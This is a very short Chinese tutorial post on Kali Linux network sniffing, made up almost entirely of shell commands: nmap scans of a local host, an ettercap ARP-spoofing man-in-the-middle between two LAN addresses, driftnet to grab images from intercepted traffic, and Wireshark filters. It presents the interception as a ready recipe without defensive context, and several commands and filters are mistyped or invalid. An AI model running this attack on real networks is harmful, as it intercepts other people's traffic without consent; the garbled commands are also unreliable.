Kali Linux嗅探ARP欺骗抓包分析教程:
2019-03-13 本文已影响0人
我准备注销了请取关
root@kali:~# nmap 192.168.0.104
root@kali:~# nmap -v -A 192.168 0.014
root@kali:~# nmap -O 192.168.0.104
root@kali:~# nmap -sn -Tq 192.168.0.104
root@kali:~# ettercap
root@kali:~# ettercap -i wlan0 -Tq -M arp:remote //192.168.0.104// //192.168.0.102//
root@kali:~# driftnet
root@kali:~# driftnet -i 2
root@kali:~# wireshark
过滤器输入:
IP.src-hosts==192.168.0.104 || tcp
IP.src-hosts==192.168.0.104 || http
OK,Done!